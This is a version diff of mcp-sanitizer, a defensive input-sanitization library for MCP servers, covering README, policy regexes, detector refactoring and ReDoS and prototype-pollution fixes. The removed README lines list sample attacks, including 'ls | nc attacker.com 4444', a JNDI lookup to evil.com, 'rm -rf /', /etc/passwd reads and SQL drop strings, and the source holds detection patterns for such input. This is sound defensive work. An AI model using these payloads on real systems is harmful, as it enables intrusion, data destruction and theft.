mcp-sanitizer 1.2.0 → 1.3.1

package/README.md

@@ -4,42 +4,30 @@ A comprehensive security sanitization library for Model Context Protocol (MCP) s
 
 [![npm version](https://badge.fury.io/js/mcp-sanitizer.svg)](https://badge.fury.io/js/mcp-sanitizer)
 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
-[![Test Coverage](https://img.shields.io/badge/Test%20Coverage-Comprehensive-brightgreen)](./test)
-[![Security Tests](https://img.shields.io/badge/Security%20Tests-500%2B-brightgreen)](./test)
+[![Security Tests](https://img.shields.io/badge/Security%20Tests-1100%2B-brightgreen)](./test)
 
 ## 🔒 Security Features
 
-MCP Sanitizer provides comprehensive, defense-in-depth protection against common attack vectors:
+MCP Sanitizer provides comprehensive, defense-in-depth protection:
 
-- ✅ **Multi-layered validation** for command injection, SQL injection, and XSS
-- ✅ **Advanced Unicode normalization** to prevent homograph attacks
-- ✅ **Context-aware sanitization** for different input types
-- ✅ **NoSQL injection protection** for MongoDB and similar databases
-- ✅ **Path traversal prevention** with robust normalization
-- ✅ **Database-specific SQL protection** for PostgreSQL, MySQL, MSSQL, Oracle
-- ✅ **Comprehensive test coverage** with 500+ security tests
+- ✅ **Multi-layered Protection**: Command injection, SQL injection, XSS, NoSQL injection, path traversal
+- ✅ **Advanced Unicode Defense**: Homograph detection, multi-pass normalization, zero-width removal
+- ✅ **Context-aware Validation**: Specialized rules for file paths, URLs, commands, and SQL queries
+- ✅ **Database-specific SQL Protection**: PostgreSQL, MySQL, MSSQL, Oracle validation and escaping
+- ✅ **Framework Integration**: Express, Fastify, and Koa middleware with `skipPaths` support
+- ✅ **Security Policies**: Pre-configured policies (STRICT, MODERATE, PERMISSIVE, DEVELOPMENT, PRODUCTION)
+- ✅ **Comprehensive Validation**: Checking 42+ attack vectors across 12 validation layers in <1ms
+- ✅ **Comprehensive Testing**: 1114 tests with 93% code coverage, sub-millisecond performance
 
 ### Security Philosophy
-
 While we maintain rigorous security standards and comprehensive test coverage, we acknowledge that:
-- No security solution is 100% bulletproof
-- Zero-day vulnerabilities may exist
-- Defense-in-depth is essential
-- Regular updates are crucial
+- No security solution is 100% bulletproof against unknown threats
+- Zero-day vulnerabilities may emerge in the future
+- Defense-in-depth is essential (use multiple security layers)
+- Regular updates are crucial for evolving threat landscape
 
 We encourage responsible disclosure of any security issues via GitHub Security Advisories.
 
-## Features
-
-### Core Capabilities
-- **Multi-layered Protection**: Command injection, SQL injection, XSS, NoSQL injection, path traversal
-- **Advanced Unicode Defense**: Homograph detection, normalization, zero-width character removal  
-- **Context-aware Validation**: Different rules for file paths, URLs, commands, and SQL queries
-- **Framework Integration**: Express, Fastify, and Koa middleware with `skipPaths` support
-- **Security Policies**: Pre-configured (STRICT, MODERATE, PERMISSIVE, DEVELOPMENT, PRODUCTION)
-- **Performance Optimized**: Sub-millisecond operations, <10ms latency
-- **Comprehensive Testing**: 500+ security tests
-
 ## Installation
 
 ```bash
@@ -94,7 +82,7 @@ const customSanitizer = new MCPSanitizer({
   policy: 'MODERATE',
   maxStringLength: 15000,
   allowedProtocols: ['https', 'mcp'],
-  blockSeverity: 'MEDIUM'  // Block medium severity and above
+  blockOnSeverity: 'medium'  // Block medium severity and above
 });
 ```
 ## Framework Middleware
@@ -103,16 +91,16 @@ const customSanitizer = new MCPSanitizer({
 
 ```javascript
 const express = require('express');
-const { createMCPMiddleware } = require('mcp-sanitizer');
+const { createExpressMiddleware } = require('mcp-sanitizer/middleware/express');
 
 const app = express();
 app.use(express.json());
 
-// Auto-detect framework and apply middleware
-app.use(createMCPMiddleware());
+// Apply middleware with defaults
+app.use(createExpressMiddleware());
 
 // Or specify configuration
-app.use(createMCPMiddleware({
+app.use(createExpressMiddleware({
   policy: 'PRODUCTION',
   mode: 'sanitize', // or 'block'
   skipPaths: ['/health', '/metrics']  // Skip sanitization for these paths
@@ -128,19 +116,19 @@ app.post('/tools/:toolName/execute', (req, res) => {
 
 ```javascript
 const fastify = require('fastify')();
-const { createFastifyPlugin } = require('mcp-sanitizer');
+const mcpSanitizerPlugin = require('mcp-sanitizer/middleware/fastify');
 
 // Register as plugin
-fastify.register(createFastifyPlugin({
+fastify.register(mcpSanitizerPlugin, {
   policy: 'MODERATE'
-}));
+});
 ```
 
 ### Koa
 
 ```javascript
 const Koa = require('koa');
-const { createKoaMiddleware } = require('mcp-sanitizer');
+const { createKoaMiddleware } = require('mcp-sanitizer/middleware/koa');
 
 const app = new Koa();
 app.use(createKoaMiddleware({
@@ -212,34 +200,12 @@ const sanitizer = new MCPSanitizer({
 
 ## Supported Attack Vectors
 
-### Directory Traversal
-- `../../../etc/passwd`
-- `..\\windows\\system32\\config`
-- `/proc/version`, `/sys/class/net`
-
-### Command Injection
-- `ls; rm -rf /`
-- `command && malicious_command`
-- `ls | nc attacker.com 4444`
-
-### SQL Injection
-- `'; DROP TABLE users;--`
-- `UNION SELECT * FROM passwords`
-- `EXEC xp_cmdshell('dir')`
-
-### Prototype Pollution
-- `{"__proto__": {"isAdmin": true}}`
-- `{"constructor": {"prototype": {"polluted": true}}}`
-
-### Template Injection
-- `{{constructor.constructor('return process')()}}`
-- `${jndi:ldap://evil.com/x}`
-- `<%= require("child_process").exec("whoami") %>`
-
-### Code Execution
-- `require('fs').readFileSync('/etc/passwd')`
-- `eval("malicious_code")`
-- `Function("return process")()`
+- **Directory Traversal** - Relative path escapes, absolute system paths, UNC paths
+- **Command Injection** - Shell metacharacters, chained commands, pipe redirection
+- **SQL Injection** - Union-based, boolean-based, time-based, stacked queries, comment injection
+- **Prototype Pollution** - Proto/constructor manipulation, deep property injection
+- **Template Injection** - Server-side template engines, JNDI lookups, expression languages
+- **Code Execution** - Dynamic evaluation, module loading, function constructors
 
 ## API Reference
 
@@ -333,10 +299,27 @@ npm run security-audit
 
 ## Performance
 
-- **Low Latency**: All operations complete in <0.5ms
-- **Memory Efficient**: Configurable limits prevent memory exhaustion
-- **Scalable**: Stateless design allows horizontal scaling
-- **Optimized**: Using C++ backed libraries where available
+- **Sub-millisecond Validation**: <1ms average latency for complete validation (12 layers checking 40+ attack vectors)
+- **High Throughput**: 7,500+ operations/second average, scales linearly with CPU cores
+- **Industry-Leading Libraries**: escape-html (31M ops/sec), sqlstring (44M ops/sec), shell-quote (2.5M ops/sec)
+- **Production Ready**: Sub-millisecond response times enable real-time validation without user-perceivable delays
+- **Memory Efficient**: Configurable limits prevent exhaustion (<100MB under attack, typical usage <60MB)
+- **Zero Overhead**: No artificial delays, pure validation logic only
+- **Scalable**: Stateless design allows horizontal scaling across multiple cores/instances
+
+### Performance Metrics
+
+| Metric | Value | Details |
+|--------|-------|---------|
+| **Average Latency** | <1ms | 0.447ms - 0.84ms depending on input complexity |
+| **Throughput** | 7,500+ ops/sec | Per CPU core, scales linearly |
+| **Attack Detection** | 0.28ms - 2.39ms | All 42 attack vectors blocked |
+| **Memory Usage** | <60MB typical | <100MB maximum under stress |
+| **CPU Efficiency** | Optimized | No busy-wait loops, pure validation |
+
+**Validation Layers**: Command injection, SQL injection (4 databases), NoSQL injection, XSS, path traversal, prototype pollution, template injection, Unicode normalization (4 passes), multi-layer encoding detection, file extension validation, protocol validation
+
+**Optimization Options**: Use `skipPaths` middleware to exempt low-risk routes (health checks, static assets, metrics endpoints)
 
 ## Examples
 
@@ -385,15 +368,6 @@ if (urlResult.blocked) {
 }
 ```
 
-## Security Considerations
-
-- **Defense in Depth**: Use sanitization as one layer of your security strategy
-- **Input Validation**: Always validate inputs at the edge of your system
-- **Output Encoding**: Consider output context when displaying sanitized data
-- **Rate Limiting**: Implement rate limiting alongside input sanitization
-- **Logging**: Log blocked attempts for security monitoring
-- **Regular Updates**: Keep the library updated for new attack patterns
-
 ## Contributing
 
 1. Fork the repository
@@ -407,43 +381,55 @@ if (urlResult.blocked) {
 
 ## Security
 
-### 🛡️ Security Testing
+### 🛡️ Run Security Benchmarks
 
 Run comprehensive security benchmarks to validate protection:
 
 ```bash
-# Run all benchmarks
-npm run benchmark
+# Quick demo (10 attack vectors + performance test)
+node benchmark/quick-demo.js
 
-# Run security-specific benchmark (42 attack vectors)
+# Comprehensive security benchmark (42 attack vectors)
 node benchmark/advanced-security-benchmark.js
 
-# Run performance benchmarks
+# Performance benchmarks
 node benchmark/library-performance.js
 node benchmark/skip-paths-performance.js
 ```
 
-### 📊 Security Testing Coverage
+**Expected Results:**
+- All 42 attack vectors blocked (100%)
+- Average latency: <1ms
+- Throughput: 7,500+ ops/sec
+- Memory usage: <60MB
+
+### 🔒 Security Testing Coverage
 
-- **Attack Vectors Tested**: 42 comprehensive test cases
-- **XSS Vectors**: 13 test cases
-- **SQL Injection Vectors**: 10 test cases
-- **Command Injection Vectors**: 10 test cases
-- **Path Traversal Vectors**: 9 test cases
-- **Memory Safety**: Bounded memory usage under attack
+| Category | Coverage |
+|----------|----------|
+| **XSS Vectors** | DOM-based, attribute injection, polyglots |
+| **SQL Injection** | All major databases, blind/time-based, bypass techniques |
+| **Command Injection** | Shell metacharacters, environment vars, process substitution |
+| **Path Traversal** | Directory traversal, absolute paths, UNC |
+| **ReDoS Protection** | Polynomial backtracking, timeout guards |
+| **Prototype Pollution** | `__proto__`, constructor, prototype, encoding bypass |
+| **Memory Safety** | Bounded memory usage under attack |
 
-### 🔒 Security Best Practices
+### 🎯 Security Best Practices
 
-1. **Always use STRICT or PRODUCTION policy for untrusted input**
-2. **Regularly update to get latest security patches**
-3. **Test with your specific attack vectors**
-4. **Monitor sanitization warnings and blocked attempts in production**
-5. **Implement defense-in-depth - don't rely on a single security layer**
+1. ✅ **Use STRICT or PRODUCTION policy** for untrusted input
+2. ✅ **Update regularly** for latest security patches
+3. ✅ **Monitor blocked attempts** in production for security insights
+4. ✅ **Implement defense-in-depth** - multiple security layers
+5. ✅ **Test with your attack vectors** using provided benchmarks
+6. ✅ **Enable rate limiting** at infrastructure layer
 
-### 📝 Security Documentation
+### 📝 Security Resources
 
 - [Security Documentation](./docs/SECURITY.md) - Comprehensive security information
 - [Benchmark Documentation](./benchmark/README.md) - Performance and security testing
+- [CodeQL Results](https://github.com/starman69/mcp-sanitizer/security/code-scanning) - Zero findings
+- [Release Notes](https://github.com/starman69/mcp-sanitizer/releases) - Security improvements per version
 
 ## Security Reporting
 

package/package.json

@@ -1,8 +1,13 @@
 {
   "name": "mcp-sanitizer",
-  "version": "1.2.0",
+  "version": "1.3.1",
   "description": "Comprehensive security sanitization library for Model Context Protocol (MCP) servers with trusted security libraries",
   "main": "src/index.js",
+  "files": [
+    "src/",
+    "LICENSE",
+    "README.md"
+  ],
   "scripts": {
     "test": "jest",
     "test:watch": "jest --watch",
@@ -37,7 +42,7 @@
     "shell-quote": "^1.8.3",
     "sqlstring": "^2.3.3",
     "unorm": "^1.6.0",
-    "validator": "^13.15.15"
+    "validator": "^13.15.22"
   },
   "devDependencies": {
     "benchmark": "^2.1.4",
@@ -48,14 +53,17 @@
     "supertest": "^6.3.3"
   },
   "engines": {
-    "node": ">=18.19.0"
+    "node": ">=20.0.0"
   },
   "repository": {
     "type": "git",
-    "url": "https://github.com/starman69/mcp-sanitizer.git"
+    "url": "git+https://github.com/starman69/mcp-sanitizer.git"
   },
   "bugs": {
     "url": "https://github.com/starman69/mcp-sanitizer/issues"
   },
-  "homepage": "https://github.com/starman69/mcp-sanitizer#readme"
+  "homepage": "https://github.com/starman69/mcp-sanitizer#readme",
+  "overrides": {
+    "qs": ">=6.14.2"
+  }
 }

package/src/config/default-config.js

@@ -49,8 +49,17 @@ const DEFAULT_CONFIG = {
     // Code execution patterns
     /require\s*\(|import\s*\(|eval\s*\(|Function\s*\(/i,
 
-    // Script injection patterns (XSS)
-    /<!--[\s\S]*?-->|<script[\s\S]*?<\/script>|<[^>]*on\w+\s*=|javascript:/i,
+    // Script injection patterns (XSS) - Heuristic detection
+    // Detects HTML comments
+    /<!--[\s\S]*?-->/i,
+    // Detects well-formed script tags (handles attributes/whitespace in closing tag)
+    /<script\b[\s\S]*?<\/script\b[^>]*>/i,
+    // Detects unclosed or malformed script tags
+    /<script[^>]*>/i,
+    // Detects event handlers (improved to catch <img onload=alert(1)>)
+    /<[^>]*[\s/]on\w+\s*=/i,
+    // Detects javascript: protocol
+    /javascript:/i,
 
     // Command chaining patterns
     /\|\s*\w+|&&|\|\||;|`/,

package/src/config/security-policies.js

@@ -33,7 +33,7 @@ const STRICT_POLICY = {
   // Minimal file type support
   allowedFileExtensions: ['.txt', '.json'],
 
-  // Comprehensive pattern blocking
+  // These patterns provide fast heuristic detection as part of defense-in-depth.
   blockedPatterns: [
     // All template injection patterns
     /\$\{.*?\}|\{\{.*?\}\}|<%.*?%>|\[\[.*?\]\]/,
@@ -44,8 +44,13 @@ const STRICT_POLICY = {
     // All code execution patterns
     /require\s*\(|import\s*\(|eval\s*\(|Function\s*\(|setTimeout\s*\(|setInterval\s*\(/i,
 
-    // All script patterns
-    /<!--[\s\S]*?-->|<script[\s\S]*?<\/script>|<[^>]*on\w+\s*=|javascript:|data:/i,
+    // XSS patterns (heuristic detection - see docs for limitations)
+    /<!--[\s\S]*?-->/i, // HTML comments
+    /<script\b[\s\S]*?<\/script\b[^>]*>/i, // Script tags (handles malformed closing)
+    /<script[^>]*>/i, // Unclosed/malformed script tags
+    /<[^>]*[\s/]on\w+\s*=/i, // Event handlers (improved pattern)
+    /javascript:/i, // JavaScript protocol
+    /data:/i, // Data protocol (can contain scripts)
 
     // All command patterns
     /\|\s*\w+|&&|\|\||;|`|\$\(|\$\{/,
@@ -148,7 +153,12 @@ const MODERATE_POLICY = {
     /\$\{.*?\}|\{\{.*?\}\}|<%.*?%>/,
     /__proto__|constructor\.prototype|prototype\.constructor/i,
     /require\s*\(|import\s*\(|eval\s*\(|Function\s*\(/i,
-    /<!--[\s\S]*?-->|<script[\s\S]*?<\/script>|<[^>]*on\w+\s*=|javascript:/i,
+    // XSS patterns (heuristic detection)
+    /<!--[\s\S]*?-->/i, // HTML comments
+    /<script\b[\s\S]*?<\/script\b[^>]*>/i, // Script tags (handles malformed closing)
+    /<script[^>]*>/i, // Unclosed/malformed script tags
+    /<[^>]*[\s/]on\w+\s*=/i, // Event handlers (improved pattern)
+    /javascript:/i, // JavaScript protocol
     /\|\s*\w+|&&|\|\||;|`/,
     /\.\.\//
   ],
@@ -237,7 +247,8 @@ const PERMISSIVE_POLICY = {
   // Minimal pattern blocking - only the most dangerous
   blockedPatterns: [
     /eval\s*\(/i, // Direct eval calls
-    /<script[\s\S]*?<\/script>/i, // Script tags
+    /<script\b[\s\S]*?<\/script\b[^>]*>/i, // Script tags (handles malformed closing)
+    /<script[^>]*>/i, // Unclosed script tags
     /__proto__\s*:/ // Direct prototype pollution
   ],
 
@@ -324,7 +335,8 @@ const DEVELOPMENT_POLICY = {
   blockedPatterns: [
     /__proto__|constructor\.prototype/i,
     /eval\s*\(/i,
-    /<script[\s\S]*?<\/script>/i,
+    /<script\b[\s\S]*?<\/script\b[^>]*>/i, // Script tags (handles malformed closing)
+    /<script[^>]*>/i, // Unclosed script tags
     /\|\s*rm|\|\s*del/
   ],
 

package/src/middleware/optimized-skip-matcher.js

@@ -133,10 +133,11 @@ class OptimizedSkipMatcher {
 
 /**
  * Prefix Trie for efficient prefix matching
+ * Uses null-prototype objects to prevent prototype pollution (CVE-TBD-006)
  */
 class PrefixTrie {
   constructor () {
-    this.root = {};
+    this.root = Object.create(null);
     this._size = 0;
   }
 
@@ -153,7 +154,8 @@ class PrefixTrie {
 
     for (const char of normalizedPath) {
       if (!node[char]) {
-        node[char] = {};
+        // Use Object.create(null) to prevent prototype pollution
+        node[char] = Object.create(null);
       }
       node = node[char];
     }

package/src/patterns/command-injection.js

@@ -21,9 +21,9 @@ const SEVERITY_LEVELS = {
 const SHELL_METACHARACTERS = [
   /[;&|`$(){}[\]]/, // Basic shell metacharacters
   /\|\s*\w+|&&|\|\||;|`/, // Command chaining patterns
-  /\$\(.*?\)|\$\{.*?\}/, // Command substitution
+  /\$\([^)]{0,200}\)|\$\{[^}]{0,200}\}/, // Command substitution (bounded)
   />\s*\/dev\/|<\s*\/dev\//, // Device redirection
-  /<<\s*EOF|<<\s*\w+/, // Here documents
+  /<<\s*(?:EOF|\w{1,20})/, // Here documents (bounded)
   /\*|\?|~|\^/ // Wildcards and expansion
 ];
 

package/src/patterns/index.js

@@ -227,81 +227,83 @@ function createPatternDetector (config = {}) {
     customPatterns = []
   } = config;
 
-  return {
-    detect: (input, options = {}) => {
-      const mergedOptions = { ...options, strictMode, customPatterns };
-
-      if (!enableCommandInjection &&
-          !enableSQLInjection &&
-          !enablePrototypePollution &&
-          !enableTemplateInjection &&
-          !enableNoSQLInjection) {
-        return { detected: false, severity: null, patterns: [] };
-      }
+  const detect = (input, options = {}) => {
+    const mergedOptions = { ...options, strictMode, customPatterns };
+
+    if (!enableCommandInjection &&
+        !enableSQLInjection &&
+        !enablePrototypePollution &&
+        !enableTemplateInjection &&
+        !enableNoSQLInjection) {
+      return { detected: false, severity: null, patterns: [] };
+    }
 
-      // Run only enabled detectors
-      const results = {
-        detected: false,
-        severity: null,
-        patterns: [],
-        detectionResults: {}
-      };
-
-      if (enableCommandInjection) {
-        const result = commandInjection.detectCommandInjection(input, mergedOptions);
-        if (result.detected) {
-          results.detected = true;
-          results.patterns.push(...result.patterns);
-          results.severity = getHigherSeverity(results.severity, result.severity);
-        }
-        results.detectionResults.commandInjection = result;
+    // Run only enabled detectors
+    const results = {
+      detected: false,
+      severity: null,
+      patterns: [],
+      detectionResults: {}
+    };
+
+    if (enableCommandInjection) {
+      const result = commandInjection.detectCommandInjection(input, mergedOptions);
+      if (result.detected) {
+        results.detected = true;
+        results.patterns.push(...result.patterns);
+        results.severity = getHigherSeverity(results.severity, result.severity);
       }
+      results.detectionResults.commandInjection = result;
+    }
 
-      if (enableSQLInjection) {
-        const result = sqlInjection.detectSQLInjection(input, mergedOptions);
-        if (result.detected) {
-          results.detected = true;
-          results.patterns.push(...result.patterns);
-          results.severity = getHigherSeverity(results.severity, result.severity);
-        }
-        results.detectionResults.sqlInjection = result;
+    if (enableSQLInjection) {
+      const result = sqlInjection.detectSQLInjection(input, mergedOptions);
+      if (result.detected) {
+        results.detected = true;
+        results.patterns.push(...result.patterns);
+        results.severity = getHigherSeverity(results.severity, result.severity);
       }
+      results.detectionResults.sqlInjection = result;
+    }
 
-      if (enablePrototypePollution) {
-        const result = prototypePollution.detectPrototypePollution(input, mergedOptions);
-        if (result.detected) {
-          results.detected = true;
-          results.patterns.push(...result.patterns);
-          results.severity = getHigherSeverity(results.severity, result.severity);
-        }
-        results.detectionResults.prototypePollution = result;
+    if (enablePrototypePollution) {
+      const result = prototypePollution.detectPrototypePollution(input, mergedOptions);
+      if (result.detected) {
+        results.detected = true;
+        results.patterns.push(...result.patterns);
+        results.severity = getHigherSeverity(results.severity, result.severity);
       }
+      results.detectionResults.prototypePollution = result;
+    }
 
-      if (enableTemplateInjection) {
-        const result = templateInjection.detectTemplateInjection(input, mergedOptions);
-        if (result.detected) {
-          results.detected = true;
-          results.patterns.push(...result.patterns);
-          results.severity = getHigherSeverity(results.severity, result.severity);
-        }
-        results.detectionResults.templateInjection = result;
+    if (enableTemplateInjection) {
+      const result = templateInjection.detectTemplateInjection(input, mergedOptions);
+      if (result.detected) {
+        results.detected = true;
+        results.patterns.push(...result.patterns);
+        results.severity = getHigherSeverity(results.severity, result.severity);
       }
+      results.detectionResults.templateInjection = result;
+    }
 
-      if (enableNoSQLInjection) {
-        const result = nosqlInjection.detectNoSQLInjection(input, mergedOptions);
-        if (result.detected) {
-          results.detected = true;
-          results.patterns.push(...result.patterns);
-          results.severity = getHigherSeverity(results.severity, result.severity);
-        }
-        results.detectionResults.nosqlInjection = result;
+    if (enableNoSQLInjection) {
+      const result = nosqlInjection.detectNoSQLInjection(input, mergedOptions);
+      if (result.detected) {
+        results.detected = true;
+        results.patterns.push(...result.patterns);
+        results.severity = getHigherSeverity(results.severity, result.severity);
       }
+      results.detectionResults.nosqlInjection = result;
+    }
 
-      return results;
-    },
+    return results;
+  };
+
+  return {
+    detect,
 
     isSecure: (input, options = {}) => {
-      return !this.detect(input, options).detected;
+      return !detect(input, options).detected;
     }
   };
 }

package/src/patterns/nosql-injection.js

@@ -504,7 +504,7 @@ class NoSQLValidator {
       /false,\s*\$where:/i,
       /['"]\s*,\s*\$where:/i,
       /admin['"]\s*,\s*\$where:/i,
-      /return\s+true\s*;?\s*\/\//i,
+      /return\s+true\s{0,5};?\s{0,5}\/\//i, // Bounded quantifiers
       /\|\|\s*true/i
     ];
 
@@ -527,7 +527,7 @@ class NoSQLValidator {
       /db\.\w+\.(drop|remove|insert)/i,
       /this\.constructor\.constructor/i,
       /process\(\)\.exit/i,
-      /['"]\s*;\s*.*?;\s*\/\//i
+      /['"]\s*;\s*[^;]{0,100};\s*\/\//i // Bounded to prevent ReDoS
     ];
 
     for (const pattern of ssjsPatterns) {